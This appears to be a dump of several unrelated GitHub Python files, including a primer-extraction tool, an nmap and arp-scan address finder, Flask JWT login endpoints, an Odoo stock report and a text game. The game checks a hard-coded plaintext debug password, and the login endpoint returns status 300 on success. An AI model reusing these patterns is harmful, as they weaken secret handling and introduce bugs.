Graf1.create_vertex(9)\r\nvrt4 = Graf1.create_vertex(4)\r\nvrt6 = Graf1.create_vertex(6)\r\nGraf1.add_directed_edge(vrt1, vrt9)\r\nGraf1.add_directed_edge(vrt9, vrt4)\r\nGraf1.add_directed_edge(vrt4, vrt6)\r\nGraf1.add_directed_edge(vrt6, vrt1)\r\n\r\nvrtt45 = Graf2.create_vertex(45)\r\nvrtt99 = Graf2.create_vertex(99)\r\nvrtt3 = Graf2.create_vertex(3)\r\nvrtt0 = Graf2.create_vertex(0)\r\nGraf2.add_directed_edge(vrtt45, vrtt99)\r\nGraf2.add_directed_edge(vrtt99, vrtt3)\r\nGraf2.add_directed_edge(vrtt3, vrtt0)\r\n\r\nvrttt1 = Graf3.create_vertex(1)\r\nvrttt2 = Graf3.create_vertex(2)\r\nvrttt3 = Graf3.create_vertex(3)\r\nvrttt4 = Graf3.create_vertex(4)\r\nvrttt5 = Graf3.create_vertex(5)\r\nGraf3.add_directed_edge(vrttt1, vrttt2)\r\nGraf3.add_directed_edge(vrttt2, vrttt5)\r\nGraf3.add_directed_edge(vrttt2, vrttt3)\r\nGraf3.add_directed_edge(vrttt3, vrttt4)\r\nGraf3.add_directed_edge(vrttt4, vrttt1)\r\n\r\nprint(\"---------Graf 1-----------\")\r\nGraf1.show()\r\nGraf1.print()\r\nprint(\"---------Graf 2-----------\")\r\nGraf2.show()\r\nGraf2.print()\r\nprint(\"---------Graf 3-----------\")\r\nGraf3.show()\r\nGraf3.print()\r\nprint(\"-------Tablica 1----------\")\r\ndead_path(Graf1, 9)\r\nprint(\"-------Tablica 2----------\")\r\ndead_path(Graf2, 45)\r\nprint(\"-------Tablica 3----------\")\r\ndead_path(Graf3, 1)","repo_name":"Szymek13/AlgorystmyIStrukturyDanych","sub_path":"Projekt 3.py","file_name":"Projekt 3.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9425110837","text":"import numpy as np\n\ndef batch_postprocess_images(img, batch_w, batch_h):\n b, ch, w, h = img.shape\n img = img.reshape((batch_w, batch_h, ch, w, h))\n img = img.transpose(0,1,3,4,2)\n img = (img + 1) *127.5\n img = np.clip(img, 0, 255)\n img = img.astype(np.uint8)\n img = img.reshape((batch_w, batch_h, w, h, ch)).transpose(0,2,1,3,4).reshape((w*batch_w, h*batch_h, ch))\n return img\n\n","repo_name":"SeitaroShinagawa/chainer-partial_convolution_image_inpainting","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"72"} +{"seq_id":"9731063548","text":"import pandas as pd\nimport numpy as np \nimport time\nimport argparse\nimport os\nimport re\nimport sys\nimport subprocess \nimport traceback\nfrom Bio import SeqIO, Entrez \nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\n\n# How to run: \n# python3 -m venv ~/my_venv\n# source ~/my_venv/bin/activate\n# pip install pandas numpy biopython argparse\n# python3 process1.py fasta_file primer_file \n\ndef extract_products(input_file, primer_file):\n df = pd.read_csv(primer_file)\n\n # Create lists of unique forward and reverse primers \n F_primers = list(set(df['F_truseq']))\n R_primers = list(set(df['R_truseq']))\n\n # Create lists of reverse complements of each primer \n F_reverse_complement = [str(Seq(primer).reverse_complement()) for primer in F_primers]\n R_reverse_complement = [str(Seq(primer).reverse_complement()) for primer in R_primers]\n\n # Start time tracking \n start_time = time.time()\n\n # Create empty dictionary to store results \n record_sequences = {}\n\n # Open the input file and parse it as a fasta file \n with open(input_file, 'r') as handle:\n records = SeqIO.parse(handle, 'fasta')\n\n # Loop through ea record \n for record in records:\n sequence = str(record.seq)\n # Create a list to store the position of ea 
primer in the sequence\n primers_positions = [] \n\n # For ea primer, find all positions in the sequence where the primer can be found \n for primer in F_primers + R_primers + F_reverse_complement + R_reverse_complement:\n for match in re.finditer(primer, sequence):\n pos = match.start() # Start position of the match\n # Append a tuple with the primer and its position to list \n primers_positions.append((primer, pos))\n\n # If there are at least 2 primer positions found \n if len(primers_positions) >= 2:\n record_id = record.id # Find the ID of the record\n # Sort the list nof primers and positions by postions \n primers_positions.sort(key=lambda x: x[1])\n\n # Create a list to store info for ea seq that was found \n sequence_info = []\n\n # For ea pair of primers \n for i in range(len(primers_positions) - 1):\n for j in range(i + 1, len(primers_positions)):\n # Extract the start and end primer and their pos\n start_primer, start_pos = primers_positions[i]\n end_primer, end_pos = primers_positions[j]\n \n # Extract the product seq btw the start and end primers\n product = sequence[start_pos:end_pos + len(end_primer)]\n \n # Caculate legnth of product \n length = len(product)\n combination = f\"{start_primer}-{end_primer}\"\n \n # Find source of ea primer \n start_primer_source = None\n end_primer_source = None\n\n if start_primer in F_primers:\n start_primer_source = \"F_primers\"\n elif start_primer in R_primers:\n start_primer_source = \"R_primers\"\n elif start_primer in F_reverse_complement:\n start_primer_source = \"F_reverse_complement\"\n elif start_primer in R_reverse_complement:\n start_primer_source = \"R_reverse_complement\"\n\n if end_primer in F_primers:\n end_primer_source = \"F_primers\"\n elif end_primer in R_primers:\n end_primer_source = \"R_primers\"\n elif end_primer in F_reverse_complement:\n end_primer_source = \"F_reverse_complement\"\n elif end_primer in R_reverse_complement:\n end_primer_source = \"R_reverse_complement\"\n\n info = {\n 'Start Primer': start_primer,\n 'End Primer': end_primer,\n 'Start Position': start_pos,\n 'End Position': end_pos + len(end_primer),\n 'Length': length,\n 'Combination': f\"{start_primer_source}-{end_primer_source}\",\n 'Product': product,\n }\n sequence_info.append(info)\n\n # Add the info for ea record to the record_sequences dictionary\n record_sequences[record_id] = sequence_info\n\n # End the time tracking \n end_time = time.time()\n\n # Print out the total execution time \n print(\"Total Execution Time:\", end_time - start_time)\n\n return record_sequences\n\ndef main(input_file, primer_file):\n # Extract products using the input file and primer file \n record_sequences = extract_products(input_file, primer_file)\n \n # Create a list to store the result dictionaries \n results = []\n\n # For ea record in the record sequences dictionary \n for record_id, sequence_info in record_sequences.items():\n for info in sequence_info:\n # Create result dictionary and add it to the results list \n result = {\n \"Record ID\": record_id,\n \"Start Primer\": info[\"Start Primer\"],\n \"End Primer\": info[\"End Primer\"],\n \"Start Position\": info[\"Start Position\"],\n \"End Position\": info[\"End Position\"],\n \"Length\": info[\"Length\"],\n \"Combination\": info[\"Combination\"],\n \"Product\": info[\"Product\"],\n }\n results.append(result)\n\n # Convert the results list to df \n df = pd.DataFrame(results)\n\n # If result file already exists, append results to it, otherwise create a new file with header \n if 
os.path.isfile('raw_results.csv'):\n        df.to_csv('raw_results.csv', mode='a', header=False, index=False)\n    else:\n        df.to_csv('raw_results.csv', index=False)\n\n# Call main function \nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument('input_file', type=str)\n    parser.add_argument('primer_file', type=str)\n    args = parser.parse_args()\n    input_file = args.input_file\n    primer_file = args.primer_file\n\n    main(input_file, primer_file)","repo_name":"lisatran251/BINF_6999","sub_path":"process1.py","file_name":"process1.py","file_ext":"py","file_size_in_byte":6645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"993093505","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n    The final goal is finding free addresses in a network range\n    Not finished but you may see how it looks like\n\"\"\"\n\nimport sys\nimport subprocess\n\n\"\"\"\n    execthis()\n    a function that runs an arbitrary command with its args\n    and returns the contents of the standard output in case of success\n    or the error text in case of disaster\n\"\"\"\n\n\ndef execthis(cmdargs, pattern):\n\n    \"\"\" create a subprocess \"p\" and pipe stdout and stderr\n    \"\"\"\n\n    p = subprocess.run(cmdargs, stdin=None, stdout=subprocess.PIPE,\n                       input=None, stderr=subprocess.PIPE,\n                       shell=False, timeout=None, check=False, universal_newlines=True)\n\n    \"\"\" get the result of the execution (much like \"$?\" in bash) and add it to the \"output\" list\n    \"\"\"\n\n    rc = p.returncode\n    rv = []\n\n    \"\"\" in case of success, the subprocess returns zero, so \"not rc\" is true\n        and flow goes through the \"if\"; in case of error will run the \"else\"\n    \"\"\"\n\n    if not rc:\n        for item, line in enumerate(p.stdout.split(\"\\n\")):\n            if pattern in line:\n                words = line.split(\" \")\n                rv.append(words[len(words) - 1])\n    else:\n        for item, line in enumerate(p.stderr.split(\"\\n\")):\n            rv.append(line)\n\n    return rc, rv\n\n\n\"\"\"\n    HERE it comes the very very true stuff\n\"\"\"\n\nif __name__ == \"__main__\":\n\n    myself = sys.argv[0]\n    print(\"Started {}...\".format(myself))\n    rc = 0\n\n    for index, item in enumerate(sys.argv[1:]):\n\n        \"\"\" we plan to execute nmap to build the range of addresses.\n            check it's installed in your system\n        \"\"\"\n\n        cmdargs = [\"nmap\", \"-sL\", \"-n\", str(item)]\n        rc, rv = execthis(cmdargs, \"Nmap scan report for\")\n\n        \"\"\" now check nmap's return code\n        \"\"\"\n\n        if rc:\n            print(\"ARGH! Rc is {:04d}\".format(rc))\n\n        \"\"\" print the address list in case of success, or the stderr contents if something goes wrong\n        \"\"\"\n\n        for outline in enumerate(rv):\n\n            \"\"\" arp-scan tests each address for presence or absence of a system\n                again, check it's installed\n            \"\"\"\n            print(outline)\n            ipaddress = outline[1]\n            cmdargs2 = [\"sudo\", \"arp-scan\", ipaddress]\n            rc2, rv2 = execthis(cmdargs2, ipaddress)\n\n            if not rc2:\n                if len(rv2) > 0:\n                    print(\"USED... \", end=\"\")\n                else:\n                    print(\"FREE... {}\".format(outline))\n            else:\n                print(\"ARGH! 
Rc is {:04d}\".format(rc2))\n\n print(\"Ended {} with code {}\".format(myself, rc2))\n\n\"\"\" THE END\n\"\"\"\n","repo_name":"javierpeces/my-python-stuff","sub_path":"140-fmad-exec-nmap-arp-scan.py","file_name":"140-fmad-exec-nmap-arp-scan.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26390755316","text":"clients1 = [\n 'Davi',\n 'Maria',\n 'Doly',\n 'Thor'\n]\n\nclients2 = [\n 'Tânia',\n 'João',\n 'Jurema',\n 'Janice'\n]\n\ndict_ex = {\n 'Name': 'Davi',\n 'Age': 21\n}\n\n\n# try:\n# d2 = dicts('Name', 'Maria', 'Age', 23)\n# except:\n# d = {\n# 'Name': 'Maria',\n# 'Age': 23\n# }\n# d2 = dicts(d)\n\n# def dicts(key, value, dictionary=None):\n# if dictionary is None:\n# dictionary = {}\n# dictionary.update(key, value)\n# return dictionary","repo_name":"Davisilvas/pythonStudies","sub_path":"section3/lesson30/dados.py","file_name":"dados.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41001767300","text":"pic_wid = 640\npic_len = 400#NOT needed\ninitial_vel = 40\ndelta_wid = 80\ndelta_vel = 20\ndelta_radius = 50\n \ndef velcontrol(position_wid0,radius0):\n position_wid = position_wid0 - pic_wid * 0.5\n radius = radius0\n velosity_left = initial_vel\n velosity_right = initial_vel\n if position_wid > 0 :\n while ( position_wid > delta_wid ) :\n velosity_left = velosity_left + delta_vel\n #velosity_right = velosity_right - delta_vel\n position_wid = position_wid - delta_wid\n elif position_wid < 0 :\n while ( position_wid < - delta_wid ) :\n #velosity_left = velosity_left - delta_vel\n velosity_right = velosity_right + delta_vel\n position_wid = position_wid + delta_wid\n while ( radius > 0 ) :\n velosity_left = velosity_left - delta_vel\n velosity_right = velosity_right - delta_vel\n radius = radius - delta_radius\n return [velosity_left,velosity_right]\n\ndef driven(vel):\n vel4 = [0,0,0,0]\n if vel[0] > 0 :\n vel4[0] = vel[0]\n elif vel[0] < 0 :\n vel4[1] = - vel[0]\n if vel[1] > 0 :\n vel4[2] = vel[1]\n elif vel[1] < 0 :\n vel4[3] = - vel[1]\n return vel4\n","repo_name":"SiyuanMa0316/object_detection_for_vehicle","sub_path":"TraceControl.py","file_name":"TraceControl.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72018253672","text":"from ..base import BaseResource\nfrom ...models import UserModel, RevokedTokenModel\nfrom flask_jwt_extended import (\n create_access_token,\n create_refresh_token,\n jwt_required,\n jwt_refresh_token_required,\n get_jwt_identity,\n get_raw_jwt\n)\nfrom flask_restful import reqparse\n\n\nparser = reqparse.RequestParser()\nparser.add_argument('username', help='This field cannot be blank', required=True)\nparser.add_argument('password', help='This field cannot be blank', required=True)\n\n\nclass UserRegistration(BaseResource):\n def post(self):\n data = parser.parse_args()\n\n if UserModel.find_by_username(data['username']):\n return self.response(\n {'message': 'User {} already exists'.format(data['username'])}, 409\n )\n\n new_user = UserModel(\n username=data['username'],\n password=UserModel.generate_hash(data['password'])\n )\n\n try:\n new_user.add_user()\n access_token = create_access_token(identity=data['username'])\n refresh_token = create_refresh_token(identity=data['username'])\n return self.response(\n {\n 'message': 'User {} was 
created'.format(data['username']),\n                    'accessToken': access_token,\n                    'refreshToken': refresh_token\n                }, 201\n            )\n        except:\n            return self.response({'message': 'Something went wrong'}, 500)\n\n\nclass UserLogin(BaseResource):\n    def post(self):\n        data = parser.parse_args()\n        current_user = UserModel.find_by_username(data['username'])\n        if not current_user:\n            return self.response(\n                {'message': 'User {} doesn\\'t exist'.format(data['username'])}, 401\n            )\n\n        if UserModel.verify_hash(data['password'], current_user.password):\n            access_token = create_access_token(identity=data['username'])\n            refresh_token = create_refresh_token(identity=data['username'])\n            return self.response(\n                {\n                    'message': 'Logged in as {}'.format(current_user.username),\n                    'accessToken': access_token,\n                    'refreshToken': refresh_token\n                }, 300\n            )\n        else:\n            return self.response({'message': 'Wrong credentials'}, 401)\n\n\nclass UserLogoutAccess(BaseResource):\n    @jwt_required\n    def post(self):\n        jti = get_raw_jwt()['jti']\n        try:\n            revoked_token = RevokedTokenModel(jti=jti)\n            revoked_token.add()\n            return self.response({'message': 'Access token has been revoked'})\n        except:\n            return self.response({'message': 'Something went wrong'}, 500)\n\n\nclass UserLogoutRefresh(BaseResource):\n    @jwt_refresh_token_required\n    def post(self):\n        jti = get_raw_jwt()['jti']\n        try:\n            revoked_token = RevokedTokenModel(jti=jti)\n            revoked_token.add()\n            return self.response({'message': 'Refresh token has been revoked'})\n        except:\n            return self.response({'message': 'Something went wrong'}, 500)\n\n\nclass TokenRefresh(BaseResource):\n    @jwt_refresh_token_required\n    def post(self):\n        current_user = get_jwt_identity()\n        access_token = create_access_token(current_user)\n        return self.response({'accessToken': access_token})\n","repo_name":"Grzanka99/eegzaminy","sub_path":"api/app/resources/v1/access.py","file_name":"access.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71132748074","text":"n=int(input())\r\nset1=set(int(i) for i in input(\" \").split(\" \"))\r\n\r\nn1=int(input())\r\nset2=set(int(i) for i in input(\" \").split(\" \"))\r\n\r\nU=set1.union(set2)\r\nIntr=set1.intersection(set2)\r\n\r\nsym=U-Intr\r\nList1=[i for i in sym]\r\nList1.sort()\r\nfor i in List1:\r\n    print(i)\r\n","repo_name":"Kunal352000/python_program","sub_path":"set2.py","file_name":"set2.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38296065768","text":"# -*- coding: utf-8 -*-\nfrom odoo import fields, models, api, _\nfrom odoo.exceptions import UserError\nimport xlsxwriter\nfrom io import BytesIO\nimport base64\nfrom datetime import datetime\nfrom odoo.osv import expression\n\n\n\n\n\nclass excelreport(models.TransientModel):\n    _name = 'report.excel'\n\n    excel_file = fields.Binary('Download report Excel', attachment=True, readonly=True)\n    file_name = fields.Char('Excel File', size=64)\n\n\n\n\nclass badstockwizard(models.TransientModel):\n    _name = 'bad.stock.wizard'\n\n\n    excel_file = fields.Binary('Download report Excel', attachment=True, readonly=True)\n    file_name = fields.Char('Excel File', size=64)\n    date_from = fields.Datetime(string=\"Date From\")\n    date_to = fields.Datetime(string=\"Date To\")\n    product_id = fields.Many2one('product.product',domain=[('type','in',('product','consu'))],string=\"Product\")\n    product_categ_ids = 
fields.Many2many('product.category',string=\"Product Categ\")\n location_id = fields.Many2one('stock.location',domain=[('usage','in',('internal','transit'))],string=\"Location\")\n search_by = fields.Selection([('product','Product'),('categ','Product Categ')],string=\"Search By\")\n\n def open_at_date(self,product,inventory_date):\n tree_view_id = self.env.ref('stock.view_stock_product_tree').id\n form_view_id = self.env.ref('stock.product_form_view_procurement_button').id\n domain = [('type', '=', 'product')]\n product_id = product\n if product_id:\n domain = expression.AND([domain, [('id', '=', product_id)]])\n\n action = {\n 'type': 'ir.actions.act_window',\n 'views': [(tree_view_id, 'tree'), (form_view_id, 'form')],\n 'view_mode': 'tree,form',\n 'name': _('Products'),\n 'res_model': 'product.product',\n 'domain': domain,\n 'context': dict(self.env.context, to_date=inventory_date),\n }\n my_action = action\n\n\n def action_bad_stock_search(self):\n\n act = self.generate_excel()\n\n return {\n\n 'type': 'ir.actions.act_window',\n 'res_model': 'report.excel',\n 'res_id': act.id,\n 'view_type': 'form',\n 'view_mode': 'form',\n 'context': self.env.context,\n 'target': 'new',\n\n }\n\n\n\n\n\n def generate_excel(self):\n\n filename = \"Bad Stock Wizard\"\n\n output = BytesIO()\n workbook = xlsxwriter.Workbook(output, {'in_memory': True})\n sheet = workbook.add_worksheet('Bad Stock Wizard')\n\n\n without_borders = workbook.add_format({\n 'bold': 1,\n 'border': 1,\n 'align': 'center',\n 'valign': 'vcenter',\n 'text_wrap': True,\n 'font_size': '11',\n\n })\n format0 = workbook.add_format({'font_size': 20, 'align': 'center', 'bold': True})\n format1 = workbook.add_format({'font_size': 10, 'align': 'center', 'bold': False})\n\n font_size_10 = workbook.add_format(\n {'font_name': 'KacstBook', 'font_size': 10, 'align': 'center', 'valign': 'vcenter', 'text_wrap': True,\n 'border': 1})\n\n table_header_formate = workbook.add_format({\n 'bold': 1,\n 'border': 1,\n 'bg_color': '#AAB7B8',\n 'font_size': '10',\n 'align': 'center',\n 'valign': 'vcenter',\n 'text_wrap': True\n })\n sheet.merge_range(1, 3, 2, 6,\"Bad Stock Wizard\", format0)\n sheet.merge_range(2, 7, 2, 8,\"Date : \"+str(datetime.today().strftime('%Y-%m-%d')), format1)\n\n sheet.set_column(4, 0, 9, without_borders)\n sheet.set_column(4, 9, 19, without_borders)\n sheet.write('A4', 'No', table_header_formate)\n sheet.write('B4', 'Product Code', table_header_formate)\n sheet.write('C4', 'Product Name', table_header_formate)\n sheet.write('D4', 'First Period', table_header_formate)\n sheet.write('E4', 'Ingoing', table_header_formate)\n sheet.write('F4', 'Outgoing', table_header_formate)\n sheet.write('G4', 'Balance', table_header_formate)\n sheet.write('H4', 'First Period Outgoing', table_header_formate)\n sheet.write('I4', 'Avg Of Cost', table_header_formate)\n sheet.write('J4', 'The Cost', table_header_formate)\n\n\n\n row = 4\n seq = 1\n col = 0\n if self.search_by =='product':\n all_stock_move_of_period = self.env['stock.move.line'].search(\n [('date', '>=', self.date_from), ('date', '<=', self.date_to),('product_id','=',self.product_id.id)])\n elif self.search_by =='categ':\n all_stock_move_of_period = self.env['stock.move.line'].search(\n [('date', '>=', self.date_from), ('date', '<=', self.date_to),('product_id.categ_id','in',self.product_categ_ids.ids)])\n elif not self.search_by :\n all_stock_move_of_period = self.env['stock.move.line'].search(\n [('date', '>=', self.date_from), ('date', '<=', self.date_to)])\n\n 
all_product_of_this_period = all_stock_move_of_period.mapped('product_id')\n all_from_location_this_period = all_stock_move_of_period.mapped('location_id')\n all_to_location_this_period = all_stock_move_of_period.mapped('location_dest_id')\n\n\n if self.location_id:\n all_from_location_this_period = all_from_location_this_period.filtered(lambda l: l.id == self.location_id.id )\n all_to_location_this_period = all_to_location_this_period.filtered(lambda l: l.id == self.location_id.id )\n\n\n for rec in all_product_of_this_period:\n product = rec.id\n domain = ([('id', '=', product)])\n my_products = self.env['product.product'].search(domain).with_context(\n dict(self.env.context, to_date=self.date_from))\n first_balance = my_products[0].qty_available\n if self.location_id:\n wared = sum (all_stock_move_of_period.filtered(lambda l: l.product_id.id == rec.id and l.location_dest_id.id ==self.location_id.id ).mapped('qty_done'))\n monsaref = sum (all_stock_move_of_period.filtered(lambda l: l.product_id.id == rec.id and l.location_id.id ==self.location_id.id ).mapped('qty_done'))\n else:\n wared = 0\n monsaref = 0\n for location in all_to_location_this_period :\n wared += sum (all_stock_move_of_period.filtered(lambda l: l.product_id.id == rec.id and l.location_dest_id.id ==location.id ).mapped('qty_done'))\n for location2 in all_from_location_this_period:\n monsaref += sum(all_stock_move_of_period.filtered(\n lambda l: l.product_id.id == rec.id and l.location_id.id == location2.id).mapped(\n 'qty_done'))\n\n sheet.write(row, col, str(seq) or '', font_size_10)\n sheet.write(row, col + 1, rec.default_code or '', font_size_10)\n sheet.write(row, col + 2, rec.name or '', font_size_10)\n sheet.write(row, col + 3, first_balance or '', font_size_10)\n sheet.write(row, col + 4, wared or '', font_size_10)\n sheet.write(row, col + 5, monsaref or '', font_size_10)\n sheet.write(row, col + 6, rec.qty_available or '', font_size_10)\n sheet.write(row, col + 7, first_balance - monsaref or '', font_size_10)\n sheet.write(row, col + 8, rec.standard_price or '', font_size_10)\n sheet.write(row, col + 9, (first_balance - monsaref) * rec.standard_price or '', font_size_10)\n\n row += 1\n seq += 1\n\n\n\n\n workbook.close()\n output.seek(0)\n\n self.write({'file_name': filename + str(datetime.today().strftime('%Y-%m-%d')) + '.xlsx'})\n self.excel_file = base64.b64encode(output.read())\n\n context = {\n 'file_name': self.file_name ,\n 'excel_file': self.excel_file,\n }\n\n act_id = self.env['report.excel'].create(context)\n return act_id\n\n\n\n\n\n\n\n","repo_name":"naham2021/bright_way","sub_path":"naham_bad_stock_excel/models/naham_bad_stock_excel_wizard_2.py","file_name":"naham_bad_stock_excel_wizard_2.py","file_ext":"py","file_size_in_byte":8076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34818285912","text":"version = 0.2\n\n\nimport LifeLike_color, LifeLike_games, LifeLike_help\n\nfrom importlib import reload\nimport shelve, random\n\n#get the saved variables from the save_game file\nshelvefile = shelve.open('save_game')\nwallet = shelvefile['wallet']\nbank = shelvefile['bank']\nnewUser = shelvefile['newUser']\nkeyboardLayout = shelvefile[\"keyboardLayout\"]\nshelvefile.close()\n\nrunning = True\ndebugger = False\npreviousCommand = \"\"\n\n\ndef toggleKeys():\n global keyboardLayout\n if keyboardLayout == \"zqsd\":\n keyboardLayout = \"wasd\"\n else: keyboardLayout = \"zqsd\"\n shelvefile = shelve.open('save_game')\n shelvefile['keyboardLayout'] 
= keyboardLayout\n shelvefile.close()\n\n\n#getting command as user input\ndef get_command():\n global previousCommand\n global newUser\n if debugger:\n print(LifeLike_color.RED)\n print(LifeLike_color.BOLD ,'[DEBUGGER] Type your commands here: ',LifeLike_color.END , end=\"\")\n else: print(LifeLike_color.BOLD ,'Type your commands here: ',LifeLike_color.END , end=\"\")\n Usercommand = input()\n newUser = False\n previousCommand = Usercommand\n return Usercommand\n\ndef parse_command(command):\n global running\n global wallet\n global bank\n global debugger\n global newUser\n\n parse_command = command.split()\n if parse_command[0] != \"pls\":\n command = 'pls ' + command\n parse_command = command.split()\n if len(parse_command) < 2:\n print('unknown command')\n return\n #if command contains a int as string, then make it a int\n preValue = str(parse_command[0] + parse_command[1]).lower()\n for index, command in enumerate(parse_command):\n if parse_command[index].isnumeric():\n parse_command[index] = int(command)\n\n #replace keywords max and half with integers\n def strToIntWallet():\n for index, command in enumerate(parse_command):\n if command == \"max\":\n parse_command[index] = int(wallet)\n elif command == \"half\":\n parse_command[index] = int(wallet / 2)\n def strToIntBank():\n for index, command in enumerate(parse_command):\n if command == \"max\":\n parse_command[index] = int(bank)\n elif command == \"half\":\n parse_command[index] = int(bank / 2)\n\n\n def checkIfValid():\n if len(parse_command) < 3:\n print('You must specify an amount!')\n return False\n elif isinstance(parse_command[2], int) == False:\n print(\"Not a valid amount, please use: max, half or an integer!\")\n return False\n else: return True\n\n #pls search command\n if preValue in ('plssearch'):\n gain = LifeLike_games.search(wallet, bank)\n if gain < 0:\n if wallet > (gain * -1):\n wallet += gain\n else:\n bank += gain\n else: wallet += gain\n #pls beg command\n elif preValue in (\"plsbeg\"):\n wallet += LifeLike_games.beg()\n #pls galble command\n elif preValue in ('plsgamble'):\n strToIntWallet()\n change = LifeLike_games.gamble(parse_command, bank)\n wallet += change\n if change != 0: print(\" You now have \", wallet, \" in wallet\")\n #pls slots commands\n elif preValue in ('plsslots'):\n strToIntWallet()\n change = LifeLike_games.slots(parse_command, bank)\n wallet += change\n if change != 0:print(\" You now have \", wallet, \" in wallet\")\n #pls postmemes command\n elif preValue in (\"plspm\", \"plspostmemes\", \"plspostmeme\"):\n wallet += LifeLike_games.postmeme()\n #pls upload command\n elif preValue in (\"plsupload\", \"plsyt\", \"plsyoutube\"):\n wallet += LifeLike_games.upload()\n #pls hunt command\n elif preValue in (\"plshunt\"):\n LifeLike_games.hunt()\n #pls fish command\n elif preValue in (\"plsfish\"):\n LifeLike_games.fish()\n #pls mazegame command\n elif preValue in (\"plsmazegame\", \"plsmaze\"):\n wallet += LifeLike_games.playmaze(keyboardLayout)\n #pls balance command\n elif preValue in ('plsbal', \"plsbalance\"):\n print(\"====================================\")\n print(\"|| coins in \", LifeLike_color.RED , \"wallet\",LifeLike_color.END , wallet)\n print(\"|| coins in \", LifeLike_color.GREEN , \"bank \",LifeLike_color.END , bank)\n print(\"|| coins in \", LifeLike_color.CYAN, \"total \", LifeLike_color.END, (wallet + bank))\n print(\"====================================\")\n #pls deposit command\n elif preValue in ('plsdep', 'plsdeposit'):\n strToIntWallet()\n if checkIfValid() == False: 
return\n if int(parse_command[2]) > wallet:\n print(\"You cant deposit more than you have in your wallet dummy!\")\n return\n bank += parse_command[2]\n wallet -= parse_command[2]\n print(\" coins in \", LifeLike_color.RED , \"wallet\",LifeLike_color.END , wallet)\n print(\" coins in \", LifeLike_color.GREEN , \"bank\",LifeLike_color.END , bank)\n #pls withdraw command\n elif preValue in ('plswith', 'plswithdraw'):\n strToIntBank()\n if checkIfValid() == False: return\n if parse_command[2] > bank:\n print(\"You cant withdraw more than you have in your bank dummy!\")\n return\n bank -= parse_command[2]\n wallet += parse_command[2]\n print(\" coins in \", LifeLike_color.RED , \"wallet\",LifeLike_color.END , wallet)\n print(\" coins in \", LifeLike_color.GREEN , \"bank\",LifeLike_color.END , bank)\n #pls inventory command\n elif preValue in (\"plsinv\", \"plsinventory\"):\n LifeLike_games.openinv()\n #pls shop command\n elif preValue in (\"plsshop\"):\n LifeLike_games.openshop()\n #pls buy command\n elif preValue in (\"plsbuy\"):\n temp = []\n for index,each in enumerate(parse_command[0:]):\n if each in (\"pls\", \"buy\"):\n pass\n else: temp.append(parse_command[index])\n wallet -= LifeLike_games.buy(\" \".join(temp), wallet)\n #pls sell commands\n elif preValue in (\"plssell\"):\n wallet += LifeLike_games.sell(parse_command[2:])\n #pls drive command\n elif preValue == 'plsdrive':\n LifeLike_games.road(20, 0.05)\n #pls settings command\n elif preValue in (\"plssettings\",\"plssetting\"):\n ret = LifeLike_help.settings(parse_command[2:])\n if ret == \"toggleKeys\":\n toggleKeys()\n #pls help command(s)\n elif preValue in (\"plshelp\"):\n if len(parse_command) < 3:\n newUser = False\n LifeLike_help.help(0)\n elif len(parse_command) == 3:\n newUser = False\n print(LifeLike_help.help(parse_command[2]))\n else:\n newUser = False\n print(\"We do not currently have a help page for that!\")\n #pls reset\n elif preValue == 'plsreset':\n print(\"Do you really want to \", LifeLike_color.RED, LifeLike_color.UNDERLINE, LifeLike_color.BOLD, \"RESET\", LifeLike_color.END, \" your progress?\", sep=\"\")\n print(\"Type RESET to reset, press enter if you DO NOT want to RESET!\")\n\n if input() == \"RESET\":\n wallet = 500\n bank = 0\n LifeLike_games.reset()\n newUser = True\n shelvefile = shelve.open('save_game')\n shelvefile['newUser'] = newUser\n shelvefile.close()\n else: return\n\n #exit the game\n elif preValue == 'plsexit' or preValue == 'plsstop':\n running = False\n return\n\n elif preValue == \"plsversion\":\n print(f\"Lifelike version {version}\")\n\n #debugger ===================================\n elif preValue == \"plsdebug\":\n if debugger == False:\n print('Password: ', end=\"\")\n if input() == \"bitchboygeorge\":\n #if input() == \"\":\n print(LifeLike_color.RED)\n debugger = True\n else: print(\"Wrong password\")\n else:\n debugger = False\n LifeLike_games.toggleDebug(False)\n elif debugger == True:\n if preValue == \"plsgimme\":\n wallet += parse_command[2]\n elif preValue == \"plsset\":\n wallet = parse_command[2]\n elif preValue == \"plsreload\":\n reload(LifeLike_games)\n elif preValue == \"plsfaster\":\n print(LifeLike_color.DGREEN,' All delays turned off!',LifeLike_color.END)\n LifeLike_games.toggleDebug(True)\n elif preValue == \"plsslower\":\n print(LifeLike_color.RED,' All delays turned on!',LifeLike_color.END)\n LifeLike_games.toggleDebug(False)\n #end of debugger ===================================\n\n else:\n print('unknown command')\nwhile running == True:\n if newUser == True:\n 
